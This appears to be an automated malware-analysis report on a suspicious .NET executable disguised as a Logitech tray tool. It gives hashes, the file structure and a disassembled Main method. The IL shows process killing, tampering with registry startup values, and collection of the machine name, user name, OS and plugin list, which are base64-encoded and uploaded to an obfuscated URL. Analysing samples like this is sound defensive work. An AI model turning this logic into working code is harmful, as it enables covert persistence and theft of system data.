Suspicious
Suspect

b0864972b55d854ae2d3e46214bb534e

PE Executable | MD5: b0864972b55d854ae2d3e46214bb534e | Size: 879.1 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score: High

Hashes
MD5: b0864972b55d854ae2d3e46214bb534e
SHA1: 3796e0fbd93177a56f18827b686ac74ccc819beb
SHA256: e70663f255cdcd944674e30d9145eb09065f55a0507e5da93268f21efe4987f1
SHA384: f9f079e8484045fb4a5ef80b1bda2eecfb4a6af81d17d4363049a21116ae4576accdf3ab18a9820cdd309b60b168b5a9
SHA512: f09867977702c0176cbe676a70fbbb70beae6d9a2b4735379c0aca6c4a087974dc605870b0951eb025a051253bdd9cc84507f231db2c1b0b6ba321c5ea12d7cd
SSDeep: 12288:9LZdfrXg+JwuKt/S/605t3bc0zLHRMoAz5UL5vT03jkNryTlZ5TzBZjiRLnBg8Gw:9Lfw+Jwz/S/6GzTK4QHv2zWW
TLSH: 1915042839EB9019F173EFB95BD4759ADA6FB3733703A45E109103864B23A81DED143A

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
LogiOverTray.Properties.Resources.resources
certificate
costura.costura.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.newtonsoft.json.dll.compressed
[Authenticode]_5366eba8.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.system.diagnostics.diagnosticsource.dll.compressed
[Authenticode]_50c89911.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.watsontcp.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.metadata
Information
Info: PE Detect: PeReader OK (file layout)
Info: PDB Path: D:\_Projects\C#\2022\LogitechV2\LogiOverTray\obj\x64\Release\b6f8b66b13df4d858a54724afbb7f791.pdb
Module Name: b6f8b66b13df4d858a54724afbb7f791.exe
Full Name: b6f8b66b13df4d858a54724afbb7f791.exe
EntryPoint: System.Void LogiOverTray.Program::Main(System.String[])
Scope Name: b6f8b66b13df4d858a54724afbb7f791.exe
Scope Type: ModuleDef
Kind: Console
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: b6f8b66b13df4d858a54724afbb7f791
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.7.2
Total Strings: 334
Main Method: System.Void LogiOverTray.Program::Main(System.String[])
Main IL Instruction Count: 463
Main IL:
newobj System.Void System.Collections.Generic.List`1<System.Diagnostics.Process>::.ctor() stloc.0 <null> ldc.i4.0 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0080: ldloc.2 ldloc.1 <null> ldloc.2 <null> ldelem.ref <null> stloc.3 <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessModuleCollection System.Diagnostics.Process::get_Modules() callvirt System.Collections.IEnumerator System.Collections.ReadOnlyCollectionBase::GetEnumerator() stloc.s V_4 br.s IL_0057: ldloc.s V_4 ldloc.s V_4 callvirt System.Object System.Collections.IEnumerator::get_Current() castclass System.Diagnostics.ProcessModule stloc.s V_5 ldloc.s V_5 callvirt System.String System.Diagnostics.ProcessModule::get_ModuleName() ldc.i4.1 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0052: leave.s IL_0057 ldloc.0 <null> ldloc.3 <null> callvirt System.Void System.Collections.Generic.List`1<System.Diagnostics.Process>::Add(System.Diagnostics.Process) leave.s IL_0057: ldloc.s V_4 pop <null> leave.s IL_0057: ldloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.Collections.IEnumerator::MoveNext() brtrue.s IL_0029: ldloc.s V_4 leave.s IL_0077: leave.s IL_007C ldloc.s V_4 isinst System.IDisposable stloc.s V_6 ldloc.s V_6 brfalse.s IL_0076: endfinally ldloc.s V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_007C: ldloc.2 pop <null> leave.s IL_007C: ldloc.2 ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> blt.s IL_0016: ldloc.1 ldloc.0 <null> callvirt System.Void System.Collections.Generic.List`1<System.Diagnostics.Process>::Reverse() ldc.i4.0 <null> stloc.s V_7 br.s IL_00B1: ldloc.s V_7 nop <null> ldloc.0 <null> ldloc.s V_7 
callvirt System.Diagnostics.Process System.Collections.Generic.List`1<System.Diagnostics.Process>::get_Item(System.Int32) callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.s 100 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_00AB: ldloc.s V_7 pop <null> leave.s IL_00AB: ldloc.s V_7 ldloc.s V_7 ldc.i4.1 <null> add <null> stloc.s V_7 ldloc.s V_7 ldloc.0 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.Diagnostics.Process>::get_Count() ldc.i4.1 <null> sub <null> blt.s IL_0091: nop ldc.i4 2500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4.2 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) stsfld System.String LogiOverTray.Program::pqdoscsjqguyhw ldc.i4.3 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) stsfld System.String LogiOverTray.Program::uqqyawavhoxaqjwj newobj System.Void System.Security.Cryptography.X509Certificates.X509Certificate2::.ctor() stsfld System.Security.Cryptography.X509Certificates.X509Certificate2 LogiOverTray.Program::lxlouwvviqdnq ldsfld System.Security.Cryptography.X509Certificates.X509Certificate2 LogiOverTray.Program::lxlouwvviqdnq call System.Byte[] LogiOverTray.Properties.Resources::get_certificate() ldsfld System.String LogiOverTray.Program::uqqyawavhoxaqjwj ldc.i4.0 <null> callvirt System.Void System.Security.Cryptography.X509Certificates.X509Certificate::Import(System.Byte[],System.String,System.Security.Cryptography.X509Certificates.X509KeyStorageFlags) ldc.i4.0 <null> stloc.s V_8 ldstr stloc.s V_9 ldstr stloc.s V_10 ldstr stloc.s V_11 ldstr stloc.s V_12 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldc.i4.4 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_13 ldloc.s V_13 callvirt System.String[] 
Microsoft.Win32.RegistryKey::GetValueNames() stloc.s V_14 ldc.i4.0 <null> stloc.2 <null> br IL_027A: ldloc.2 ldloc.s V_14 ldloc.2 <null> ldelem.ref <null> stloc.s V_15 ldloc.s V_15 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue IL_0276: ldloc.2 ldloc.s V_13 ldloc.s V_15 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_16 ldloc.s V_16 callvirt System.String System.Object::ToString() call System.String System.IO.Path::GetDirectoryName(System.String) call System.String[] System.IO.Directory::GetFiles(System.String) stloc.s V_17 ldc.i4.0 <null> stloc.s V_18 br.s IL_01B2: ldloc.s V_18 ldloc.s V_17 ldloc.s V_18 ldelem.ref <null> stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_01A7: leave.s IL_01AC ldloc.s V_19 callvirt System.String System.Object::ToString() callvirt System.String System.String::ToLower() ldc.i4.5 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_01A7: leave.s IL_01AC ldloc.s V_19 call System.String System.IO.Path::GetDirectoryName(System.String) stloc.s V_12 leave.s IL_01BA: leave.s IL_01BF leave.s IL_01AC: ldloc.s V_18 pop <null> leave.s IL_01AC: ldloc.s V_18 ldloc.s V_18 ldc.i4.1 <null> add <null> stloc.s V_18 ldloc.s V_18 ldloc.s V_17 ldlen <null> conv.i4 <null> blt.s IL_0173: ldloc.s V_17 leave.s IL_01BF: ldloc.s V_12 pop <null> leave.s IL_01BF: ldloc.s V_12 ldloc.s V_12 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue IL_0276: ldloc.2 newobj System.Void System.Random::.ctor() ldc.i4.3 <null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4.3 
<null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() stloc.s V_20 ldc.i4.6 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_20 call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_21 ldloc.s V_12 ldc.i4.7 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.s V_9 ldloc.s V_12 ldloc.s V_9 ldc.i4.8 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4 1000 ldc.i4 9999 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_18 ldloca.s V_18 call System.String System.Int32::ToString() call System.String System.Text.RegularExpressions.Regex::Replace(System.String,System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_10 ldloc.s V_9 ldloc.s V_10 call System.Void System.IO.File::Move(System.String,System.String) ldloc.s V_13 ldloc.s V_21 ldloc.s V_10 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldloc.s V_13 ldloc.s V_15 ldc.i4.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String,System.Boolean) leave.s IL_0276: ldloc.2 pop <null> leave.s IL_0276: ldloc.2 ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldloc.s V_14 ldlen <null> conv.i4 <null> blt IL_013E: ldloc.s V_14 leave.s IL_0292: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldloc.s V_13 brfalse.s IL_0291: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldc.i4.4 
<null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_22 call System.String System.IO.Directory::GetCurrentDirectory() call System.String[] System.IO.Directory::GetFiles(System.String) stloc.s V_14 ldc.i4.0 <null> stloc.2 <null> br IL_050B: ldloc.2 ldloc.s V_14 ldloc.2 <null> ldelem.ref <null> stloc.s V_23 ldloc.s V_23 callvirt System.String System.String::ToLower() ldc.i4.5 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0507: ldloc.2 ldloc.s V_23 call System.IO.DirectoryInfo System.IO.Directory::GetParent(System.String) callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.7 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.s V_9 ldloc.s V_22 callvirt System.String[] Microsoft.Win32.RegistryKey::GetValueNames() stloc.s V_17 ldc.i4.0 <null> stloc.s V_18 br.s IL_0345: ldloc.s V_18 ldloc.s V_17 ldloc.s V_18 ldelem.ref <null> stloc.s V_24 ldloc.s V_24 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_033F: ldloc.s V_18 ldloc.s V_22 ldloc.s V_24 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_25 ldloc.s V_9 callvirt System.Int32 System.String::get_Length() ldc.i4.0 <null> ble.s IL_033F: ldloc.s V_18 ldloc.s V_25 callvirt System.String System.Object::ToString() ldloc.s V_9 call System.String System.IO.Path::GetFileName(System.String) callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_033F: ldloc.s V_18 ldloc.s V_24 stloc.s V_11 ldc.i4.1 <null> stloc.s V_8 ldloc.s V_18 ldc.i4.1 <null> add <null> stloc.s V_18 ldloc.s V_18 ldloc.s V_17 ldlen <null> conv.i4 <null> blt.s 
IL_02FE: ldloc.s V_17 ldloc.s V_8 brtrue IL_0507: ldloc.2 newobj System.Void System.Random::.ctor() ldc.i4.3 <null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4.3 <null> ldc.i4.5 <null> callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) call System.String LogiOverTray.Program::lrkqjntplujnw(System.Int32) callvirt System.String System.String::ToLower() stloc.s V_26 ldc.i4.6 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_26 call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_11 ldloc.s V_9 callvirt System.String System.Object::ToString() call System.IO.DirectoryInfo System.IO.Directory::GetParent(System.String) callvirt System.String System.IO.FileSystemInfo::get_FullName() ldloc.s V_9 ldc.i4.8 <null> call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) newobj System.Void System.Random::.ctor() ldc.i4.s 10 ldc.i4 9999 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_18 ldloca.s V_18 call System.String System.Int32::ToString() call System.String System.Text.RegularExpressions.Regex::Replace(System.String,System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_10 ldloc.s V_9 ldloc.s V_10 call System.Void System.IO.File::Move(System.String,System.String) ldloc.s V_22 ldloc.s V_11 ldloc.s V_10 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) newobj System.Void System.Net.WebClient::.ctor() stloc.s V_27 ldloc.s V_27 callvirt System.Net.WebHeaderCollection System.Net.WebClient::get_Headers() ldc.i4.s 12 ldc.i4.s 9 call System.String 
LogiOverTray.Program::jnrfygrmhahw(System.Int32) callvirt System.Void System.Net.WebHeaderCollection::Add(System.Net.HttpRequestHeader,System.String) call System.String System.Environment::get_MachineName() ldc.i4.s 10 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String System.Environment::get_UserName() call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_28 newobj System.Void LogiOverTray.vdjcvkuheocfiixp::.ctor() dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_28 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0437: call System.Guid System.Guid::NewGuid() ldloc.s V_28 br.s IL_044B: callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.Guid System.Guid::NewGuid() stloc.s V_31 ldloca.s V_31 constrained. System.Guid callvirt System.String System.Object::ToString() callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String LogiOverTray.vdjcvkuheocfiixp::nomepc dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() newobj System.Void Microsoft.VisualBasic.Devices.ComputerInfo::.ctor() call System.String Microsoft.VisualBasic.Devices.ComputerInfo::get_OSFullName() ldc.i4.s 11 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) call System.String System.String::Concat(System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String LogiOverTray.vdjcvkuheocfiixp::operationalsystem dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldsfld System.String LogiOverTray.Program::pqdoscsjqguyhw callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String 
LogiOverTray.vdjcvkuheocfiixp::versionapp newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_29 call System.Collections.Generic.List`1<System.String> LogiOverTray.Program::chtfsrbpk() stloc.s V_29 dup <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldc.i4.s 12 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_29 callvirt System.String[] System.Collections.Generic.List`1<System.String>::ToArray() call System.String System.String::Join(System.String,System.String[]) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String LogiOverTray.vdjcvkuheocfiixp::plugins ldloc.s V_29 callvirt System.Void System.Collections.Generic.List`1<System.String>::Clear() call System.String Newtonsoft.Json.JsonConvert::SerializeObject(System.Object) stloc.s V_30 ldloc.s V_27 ldc.i4.s 13 call System.String LogiOverTray.Program::jnrfygrmhahw(System.Int32) ldloc.s V_30 callvirt System.String System.Net.WebClient::UploadString(System.String,System.String) pop <null> leave.s IL_0502: leave.s IL_0507 ldloc.s V_27 brfalse.s IL_0501: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0507: ldloc.2 pop <null> leave.s IL_0507: ldloc.2 ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldloc.s V_14 ldlen <null> conv.i4 <null> blt IL_02B8: ldloc.s V_14 leave.s IL_0523: leave.s IL_0528 ldloc.s V_22 brfalse.s IL_0522: endfinally ldloc.s V_22 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0528: call System.Void LogiOverTray.Program::xtaxjadxrhihuqxli() pop <null> leave.s IL_0528: call System.Void LogiOverTray.Program::xtaxjadxrhihuqxli() call System.Void LogiOverTray.Program::xtaxjadxrhihuqxli() ldc.i4 200 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_052D: ldc.i4 200

Characteristics
No malware configuration was found at this point.